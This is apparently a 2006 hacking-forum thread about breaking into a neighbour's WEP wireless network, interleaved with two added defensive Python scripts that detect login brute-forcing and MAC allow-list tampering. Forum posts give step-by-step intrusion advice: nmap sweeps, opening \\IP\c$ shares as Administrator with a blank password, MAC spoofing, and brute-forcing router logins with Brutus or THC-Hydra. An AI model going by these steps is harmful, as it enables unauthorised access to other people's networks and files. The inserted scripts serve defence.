does Brutus simply try all possible combinations of your user and password lists? In other words if for example the username is something obscure like a1b2c3d4 then it will never work (because this username isn't in the user list)?


PostPosted: Mon Sep 04, 2006 8:05 pm
Site Admin
Joined: Sat Feb 11, 2006 10:44 pm
Posts: 6601
Location: UK :-)
Then you need to get a bigger and better user list or try brute forcing. It's not perfect, but most old-ish APs only require a password.

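The exchange above is about guessing a router's admin password from user and password lists. On the owner's side, the counter-measure is to notice many failed logins from one source in a short window and to back off or lock that source out, which is what the following Python monitor does. It is an added example, not code from the thread or from Brutus; the log format ("<epoch_seconds> <src_ip> <user> <FAIL|OK>"), the window, the failure limit and the sample lines are constructed assumptions for the example.

```python
"""Detect password guessing against an admin login and decide lockout/back-off.

Added example: not code from the thread. Log format is an assumption:
"<epoch_seconds> <src_ip> <user> <FAIL|OK>", one attempt per line.
"""
from collections import defaultdict, deque

WINDOW_SECONDS = 60   # look-back window (example value)
MAX_FAILURES = 5      # failures within the window that trigger a lockout


class LoginMonitor:
    def __init__(self, window=WINDOW_SECONDS, max_failures=MAX_FAILURES):
        self.window = window
        self.max_failures = max_failures
        self.failures = defaultdict(deque)   # src -> timestamps of recent failures
        self.locked = {}                     # src -> time the lockout was triggered

    def _prune(self, src, now):
        """Drop failures older than the window so old mistakes do not count."""
        q = self.failures[src]
        while q and now - q[0] > self.window:
            q.popleft()

    def observe(self, ts, src, user, result):
        """Feed one record; return "locked" if src is locked out after it, else None."""
        if src in self.locked:
            return "locked"
        if result == "OK":
            # A real user who finally gets it right is not an attacker: reset.
            self.failures[src].clear()
            return None
        q = self.failures[src]
        q.append(ts)
        self._prune(src, ts)
        if len(q) >= self.max_failures:
            self.locked[src] = ts
            return "locked"
        return None

    def backoff_seconds(self, src):
        """Exponential delay to impose before answering the next attempt from src."""
        return min(2 ** len(self.failures[src]), 300)


def process_log(lines, monitor=None):
    """Parse the lines; return (sorted list of locked sources, count of ignored lines)."""
    monitor = monitor or LoginMonitor()
    ignored = 0
    for line in lines:
        parts = line.split()
        if len(parts) != 4 or parts[3] not in ("FAIL", "OK") or not parts[0].isdigit():
            ignored += 1
            continue
        monitor.observe(int(parts[0]), parts[1], parts[2], parts[3])
    return sorted(monitor.locked), ignored


# Constructed sample: 192.168.1.104 runs through a user list one attempt per
# second; 192.168.1.50 mistypes once and then logs in correctly.
SAMPLE_LOG = [
    f"{1000 + i} 192.168.1.104 {u} FAIL"
    for i, u in enumerate(["admin", "root", "administrator", "user", "guest", "a1b2c3d4"])
] + [
    "1100 192.168.1.50 admin FAIL",
    "1105 192.168.1.50 admin OK",
    "malformed line",
]

if __name__ == "__main__":
    print(process_log(SAMPLE_LOG))
```

Note the design choice: the lockout is keyed on the source address, not the username, because a list-driven guesser cycles through many usernames from one place, and a per-username lockout would let it run unimpeded.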
 
PostPosted: Mon Sep 04, 2006 10:34 pm
Just beginning to get the hang of it
Joined: Sat Aug 26, 2006 3:04 am
Posts: 15
Nokia, dunno if you saw my earlier post with several questions... and although Azrael kinda answers a bit, maybe I'm having trouble understanding his English + he doesn't answer all my questions. Would you mind addressing them? :)

I am also confused as to how to use Brutus to do a brute-force attack... there aren't many options and not much documentation on the website.


PostPosted: Mon Sep 04, 2006 11:27 pm
THE Prancing Pirate
Joined: Fri Feb 24, 2006 10:47 pm
Posts: 8167
SubMatrix wrote:
When you finally connect to this vulnerable IP within your residential subnet, you seem to be using wireless to connect to his open TCP port (correct?).

Ok, Nokia has been filling you with crap ;)

J/k. What you are doing is associating your wireless network card to their vulnerable Access Point. It is vulnerable because it uses WEP, which, as demonstrated, is fairly easy to crack (if you can get enough packets).

Then, when you are associated, you can do all sorts of things. Now that you're on their WLAN (Wireless Local Area Network), you can do an nmap ping sweep of the network (nmap -sP 192.168.1.0/24 - although the first three sets of digits will depend on the network), and from there have a bit of fun... If the NetBIOS ports are open, go enumerating users and such. Oh, and try Start -> Run -> \\IPorHostname\c$ and try using the credentials 'Administrator' with a blank password. If the user is not very computer literate, you'll find yourself with access to his whole C drive ;)

eg. If you see another client on the network with IP 192.168.1.102 and like the look of it, go to run and type:

\\192.168.1.102\c$

Then, when the popup comes up:

Username: Administrator
Password:


If he hasn't set an admin password... Pwnt! :D

Try the other things Nokia mentioned too.
Quote:
Is this because it is impossible to connect over wired?

Well, unless you want to drill through the wall until you find an ethernet cable, yank that out and plug it into your PC - yes, it is impossible ;)

Unless it's your AP, of course... In which case there's no need to crack the WEP key anyway, because you can connect via ethernet, which probably won't have any authentication. Hehe :)
Quote:
is it possible to add your wired network card's MAC address to the router to make it think you are on the LAN?

Nope. You can add your own MAC address to the router's MAC address filtering 'allow' table, but it knows where it is receiving the packets from that MAC address (it knows it's not receiving them via an ethernet port, but wirelessly), so that's why it says that a client is connected wirelessly (or via ethernet - it depends on how the client is connected, of course).
Quote:
Also, since you are connecting to this host using wireless, this guy must physically be pretty close to you?

Yes. And the thicker the walls, the closer he must be. In my house, I barely get wireless on the floor below the AP ;) However, with wooden floors (and a bit of concrete, of course), it will pass through much more easily. SOHO wireless waves usually travel around 50-200m in open air... It depends on how powerful your router is ;)
Quote:
are you connecting to this host by talking to his router, which is in turn relaying you to him? Or are you directly talking to him and bypassing the router completely?

What, when you are connected to the victim's router?

Ok, let me outline the situation.

You are Attacker John. He is Victim Loser.

John cracks the WEP key, and then discovers that MAC address filtering is enabled. He sniffs a client's MAC address, waits till it goes offline, spoofs his MAC address and connects. Then, he tries to connect to the router as Admin - he does this either by finding out its make and model and looking up the default credentials on a default password list (most users don't change the default username/password), or by brute forcing the password with an app like Brutus or THC-Hydra. He then adds his own MAC address (original, or another spoofed one, if you like, such as ab:cd:ef:12:34:56), so that he can connect when the other dude's connected without making him suspect anything. Then, he starts probing the network. He does this by sending packets to the router, and those then get routed to the destination IP (talking simply). In other words, if John is at 192.168.1.104, and Loser is at 192.168.1.102, and he starts \\192.168.1.102\c$'ing Loser's PC, those packets will first go to the router, which then routes (i.e. passes on) the packets to 192.168.1.102.

In reality, the router forwards these packets to ALL the PCs connected to it, and the one with the same MAC address as the destination one reads the packets, but let's try to forget that for now to keep it simple! :D

If you have any more questions, just fire away :)

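J_K9's walkthrough above has the intruder spoofing an allowed client's MAC while that client is offline, and later adding an extra MAC to the router's allow table. From the owner's side, the second step shows up as an allow-list entry that matches no device you own, and the first shows up as the same MAC associating while a session for it is still open. The Python audit below checks for both; it is an added example and not code from the thread. The association-log format ("<epoch> <ASSOC|DISASSOC> <mac>"), the inventory and the sample data are constructed assumptions for the example; the MAC ab:cd:ef:12:34:56 is the one J_K9 used in his story.

```python
"""Audit an AP's MAC allow-list and association log for tampering.

Added example: not code from the thread. Assumed inputs: the owner's own
inventory of MACs, the AP's current allow-list, and association log lines of
the form "<epoch> <ASSOC|DISASSOC> <mac>".
"""


def normalise_mac(mac):
    """Canonical lower-case colon form ("ab:cd:ef:12:34:56"); ValueError on junk."""
    hexdigits = mac.replace(":", "").replace("-", "").lower()
    if len(hexdigits) != 12 or any(c not in "0123456789abcdef" for c in hexdigits):
        raise ValueError(f"bad MAC: {mac!r}")
    return ":".join(hexdigits[i:i + 2] for i in range(0, 12, 2))


def unknown_allowed(allow_list, inventory):
    """MACs the AP will accept that are not on the owner's inventory (sorted)."""
    inv = {normalise_mac(m) for m in inventory}
    return sorted({normalise_mac(m) for m in allow_list} - inv)


def overlapping_associations(log_lines):
    """Return [(epoch, mac)] for every ASSOC seen while that MAC already had an open session."""
    open_since = {}    # mac -> epoch at which its current session started
    overlaps = []
    for line in log_lines:
        parts = line.split()
        if len(parts) != 3 or parts[1] not in ("ASSOC", "DISASSOC"):
            continue   # not a record we understand
        try:
            ts, mac = int(parts[0]), normalise_mac(parts[2])
        except ValueError:
            continue
        if parts[1] == "ASSOC":
            if mac in open_since:
                overlaps.append((ts, mac))   # two devices claiming one MAC
            open_since[mac] = ts
        else:
            open_since.pop(mac, None)
    return overlaps


# Constructed data: INVENTORY is what the owner knows they own, ALLOW_LIST is
# what the AP currently accepts, ASSOC_LOG is what the AP recorded.
INVENTORY = ["00:11:22:33:44:55", "00-11-22-33-44-66"]
ALLOW_LIST = ["00:11:22:33:44:55", "00:11:22:33:44:66", "ab:cd:ef:12:34:56"]
ASSOC_LOG = [
    "1000 ASSOC 00:11:22:33:44:55",
    "1200 DISASSOC 00:11:22:33:44:55",   # the real client goes offline
    "1210 ASSOC 00:11:22:33:44:55",      # a second device using the same MAC
    "1300 ASSOC 00:11:22:33:44:55",      # the real client returns: overlap
    "1400 ASSOC 00:11:22:33:44:66",
    "not a log line",
]

if __name__ == "__main__":
    print("allowed but not in inventory:", unknown_allowed(ALLOW_LIST, INVENTORY))
    print("overlapping sessions:", overlapping_associations(ASSOC_LOG))
```

The overlap check is only a signal, not proof: a client that crashed without sending a disassociation will also re-associate on top of a stale session, so treat a hit as something to look at rather than an alarm on its own. The allow-list diff, by contrast, is exact: anything the AP accepts that you do not own should not be there.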
 
PostPosted: Mon Sep 04, 2006 11:57 pm
UtterTazNutter
Joined: Sat Aug 12, 2006 5:18 pm
Posts: 2981
Location: Staffordshire, UK
J_K9 wrote:
Quote:
Is this because it is impossible to connect over wired?

Well, unless you want to drill through the wall until you find an ethernet cable, yank that out and plug it into your PC - yes, it is impossible ;)


Actually that's not strictly true. I'm pretty sure there's a way to grab data from nearby cables using magnetic fields or something like that... I don't really remember, but that's why the military tend to use lead-lined buildings and use fibre optics between buildings.

Quote:
Magnetic fields and current induction work in two ways. They don't just generate noise in signal carrying conductors; they also let the information on the conductor to be leaked out. Fluctuations in the induced magnetic field outside a conductor carry the same information as the current passing through the conductor. Shielding the wire, as in coaxial cables can reduce the problem, but sometimes shielding can allow enough signal leak to allow tapping, which is exactly what we wouldn't want.


http://www.doc.ic.ac.uk/~nd/surprise_97 ... .html#data

 
PostPosted: Tue Sep 05, 2006 12:06 am
THE Prancing Pirate
Joined: Fri Feb 24, 2006 10:47 pm
Posts: 8167
llama love wrote:
Actually that's not strictly true. I'm pretty sure there's a way to grab data from nearby cables using magnetic fields or something like that... I don't really remember, but that's why the military tend to use lead-lined buildings and use fibre optics between buildings.

Hmm... Ok. But what are the chances of you being able to tap into that noise if you've got two walls between you and the cables? Or, if you're wardriving, and you're doing this from your car?

Extremely low ;)

 
PostPosted: Tue Sep 05, 2006 12:29 am
UtterTazNutter
Joined: Sat Aug 12, 2006 5:18 pm
Posts: 2981
Location: Staffordshire, UK
Heh heh, both pretty low without some neat equipment or some serious brain power :D It can be done through walls though (hence the lead-lined rooms). Of course it's nowhere near as easy as cracking a WEP key :D I want to get rid of WEP here but my brother's NIC doesn't support anything else :(

 
PostPosted: Tue Sep 05, 2006 1:52 am
THE Prancing Pirate
Joined: Fri Feb 24, 2006 10:47 pm
Posts: 8167
llama love wrote:
Heh heh, both pretty low without some neat equipment or some serious brain power :D

Haha! Exactly... And are you going to see Mr. Average Cracker with the expensive equipment needed to do that, when there's a vulnerable WEP-encrypted network right there too? ;) :D
Quote:
I want to get rid of wep here but my brothers nic doesnt support anything else :(

Hehe! Tell him to stop being lazy and buy a new card! A cheap one will cost around £10 - it's not like he's going to lose all his savings on it :P
